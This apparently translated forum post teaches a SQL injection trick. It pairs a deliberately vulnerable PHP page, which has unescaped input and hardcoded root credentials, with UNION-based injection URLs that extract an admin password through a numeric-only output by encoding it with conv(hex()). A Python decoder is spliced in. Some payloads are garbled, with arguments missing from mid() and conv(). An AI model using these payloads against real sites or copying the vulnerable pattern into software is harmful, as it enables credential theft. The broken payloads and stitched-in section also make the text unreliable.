Author: toby57
I believe many of us do not make enough use of union queries during injection. It is true that union queries are very convenient: there is no need to guess one character after another, which greatly improves productivity. However, because of the conditions they require, those conditions often cannot be fully met, and at that point I had to stare at the injection point, sigh, and fall back with grief on the most primitive method. Of course, if the conditions really are not met there is nothing we can do. But sometimes we are simply careless and fail to use the highly efficient union query at all, which does not live up to "representing the most advanced productive forces" in the "Three Represents". One such situation is described below. ^_^ (I believe many friends already know this, but I haven't seen it written up on the Internet, so I raise it here, mainly to entertain myself.)
mysql> select * from test;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | admin888 |
+----+----------+----------+
1 row in set (0.03 sec)
test.php:
<?php
$id = $_GET['id'];
$lnk = mysql_connect('localhost', 'root', 'root') or die('Not connected : ' . mysql_error());
mysql_select_db('test', $lnk) or die("Can't use foo : " . mysql_error());
// $id is interpolated into the SQL unescaped; this is the injection point discussed below
$query = "SELECT count(*) FROM test where id = $id";
$result = mysql_query($query);
while ($result_row = mysql_fetch_row($result)) {
    // only a non-empty numeric value in the first column is echoed back
    if ($result_row[0] && is_numeric($result_row[0])) {
        echo $result_row[0];
    }
}
?>
We all know that in a union query not only must the number of columns before and after the UNION be equal, but the column types must match as well. At this injection point the return value of the original query is numeric. So what do we do if we want to use a union query to obtain the password, which is of text type?
In fact, we can first find out the password length:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20length(password)%20from%20test%23
The returned result is 8. OK, then:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20ascii(mid(password,))%20from%20test
The returned result is the ASCII code of the first character of the password. Then it is just a matter of checking each character in turn.
However, we actually have a more convenient method. Hey, a single query is enough.
We submit:
http://www.hacker.com/test.php?id=1%20and%201=2%20union%20select%20conv(hex(password),)%20from%20test
7017854418938247224 is returned. Converting this decimal value to hexadecimal gives 0x61646D696E383838, which is the hex encoding of "admin888". Haha, I don't want to go into the principle any further; I believe everyone already understands it.
If you leave out the conv function, the type will not match.
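The following Python is an added example, not code from the post. It models what the numeric column carries (assuming the query is conv(hex(password),16,10), the base-16 to base-10 form the post's result implies) and decodes it back, and it covers the point the post leaves out: MySQL's CONV() works with 64-bit precision, so an output channel restricted to a single numeric value by is_numeric() still leaks up to 8 bytes of any text column, while anything longer saturates and is lost. The saturating value is modelled after MySQL's behaviour.

```python
from typing import Optional

# CONV() in MySQL operates on unsigned 64-bit values; longer inputs saturate
# at this maximum (18446744073709551615) instead of producing a larger number.
U64_MAX = (1 << 64) - 1


def mysql_conv_hex(value: str) -> int:
    """Model of CONV(HEX(value), 16, 10) as the database server computes it.

    HEX() emits the bytes of the string in hexadecimal; CONV() parses that as
    an unsigned 64-bit integer, so only the first 8 bytes are representable.
    """
    n = int.from_bytes(value.encode("utf-8"), "big") if value else 0
    return min(n, U64_MAX)


def decode_conv_result(n: int) -> Optional[str]:
    """Turn a CONV(HEX(...),16,10) result back into the text it encodes.

    Returns None when the value saturated: the bytes beyond 64 bits were
    discarded on the server and cannot be reconstructed from the number.
    """
    if n >= U64_MAX:
        return None
    length = (n.bit_length() + 7) // 8
    return n.to_bytes(length, "big").decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Constructed sample values: the row from the post and a 9-byte variant.
    for secret in ("admin888", "admin8888"):
        n = mysql_conv_hex(secret)
        print(f"{secret!r:12} -> {n} -> {decode_conv_result(n)!r}")
```

The first sample reproduces the post's 7017854418938247224 and decodes to admin888; the second shows why a column longer than 8 bytes cannot be read through one numeric value.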
OK! It's all done.